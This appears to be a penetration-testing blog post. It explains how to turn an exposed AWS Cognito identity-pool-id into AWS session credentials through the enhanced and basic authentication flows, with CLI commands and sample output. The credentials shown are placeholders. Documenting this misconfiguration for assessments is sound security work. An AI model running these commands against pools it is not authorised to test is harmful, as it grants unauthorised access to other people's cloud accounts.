Exploiting Exposed AWS Cognito identity-pool-id

0 Comments

  • Home
  • /
  • Blog
  • /
  • Exploiting Exposed AWS Cognito identity-pool-id
Share0
Tweet0
Share0
Share0
Tweet0
Share0

Let’s assume you have gained access to an AWS Cognito identity-pool-id during an assessment. Here we will see, how that can be exploited to gain access to AWS Credentials.

An identity-pool-id looks like: us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6

Following command can be used to get the IdentityId

# aws cognito-identity get-id --identity-pool-id us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6 --no-sign
{
    "IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd"
}

Following command can be used to get the AWS Credentials using the generated Identity ID.

aws cognito-identity get-credentials-for-identity --identity-id us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd --no-sign
{
    "IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd",
    "Credentials": {
        "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
        "SecretKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "SessionToken": "FwoGZXIvYXdzEItuEXAMPLESESSIONTOKEN...[REMOVED]",
        "Expiration": 4892047561.0
    }
}

This credentials can be used to authenticate to AWS however this is called enhanced authentication flow. This is a restrictive session. This only allows access to limited services even if the role has access to other services.

There is another flow called Basic Authentication Flow, if the identity-pool-id has this flow enabled, we can get access to all the services available to this role. Following steps can be used for Basic Authentication Flow.

Following command can be used to get the IdentityId

# aws cognito-identity get-id --identity-pool-id us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6 --no-sign
{
    "IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd"
}

Following command can be used to get the Open ID Token

aws cognito-identity get-open-id-token --identity-id us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd --no-sign
{
    "IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd",
    "Token": "eyKyrt...[REMOVED]"
}

Use the previously generated token to get the IAM Session Credentials.

aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::123456789012:role/test_role" --role-session-name sessionname --web-identity-token "eyKyrt...[REMOVED]"
{
    "Credentials": {
        "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "SessionToken": "FwoGZXIvYXdzEItuEXAMPLESESSIONTOKEN...[REMOVED]",
        "Expiration": "2025-02-02T12:42:19Z"
    },
    "SubjectFromWebIdentityToken": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd",
    "AssumedRoleUser": {
        "AssumedRoleId": "AKIAIOSFODNN7EXAMPLE:sessionname",
        "Arn": "arn:aws:sts::335963293212:assumed-role/test_role/sessionname"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd"
}

More Info:

https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html

 Previous
Next

Tags

AWS, Cloud Security

You may also like

  • Home
  • /
  • Blog
  • /
  • Exploiting Exposed AWS Cognito identity-pool-id